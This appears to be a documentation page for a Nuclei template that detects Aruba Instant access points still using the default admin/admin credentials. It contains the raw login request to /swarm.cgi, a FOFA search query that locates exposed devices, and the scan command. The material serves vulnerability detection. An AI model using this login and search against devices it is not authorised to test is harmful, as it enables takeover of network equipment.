Aruba Instant - Default Login
ID: aruba-instant-default-login
Severity: high
Author: SleepingBag945
Tags: aruba,default-login
Description
Section titled “Description”Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
YAML Source
Section titled “YAML Source”id: aruba-instant-default-login
info: name: Aruba Instant - Default Login author: SleepingBag945 severity: high description: | Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions. reference: - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router. classification: cpe: cpe:2.3:a:arubanetworks:aruba_instant:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: arubanetworks product: aruba_instant fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js" tags: aruba,default-login
http: - raw: - | POST /swarm.cgi HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838
attack: pitchfork payloads: username: - admin password: - admin host-redirects: true matchers: - type: dsl dsl: - 'status_code_1 == 200' - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")' condition: and# digest: 490a0046304402205899adf9619ee234cd36fe4617170863fc6219135e360b4521a41fdddb81216a02203a1da1301306c09ccf72eaceb7de1701793c0636d8df54269958277ac7f47192:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/default-logins/others/aruba-instant-default-login.yaml"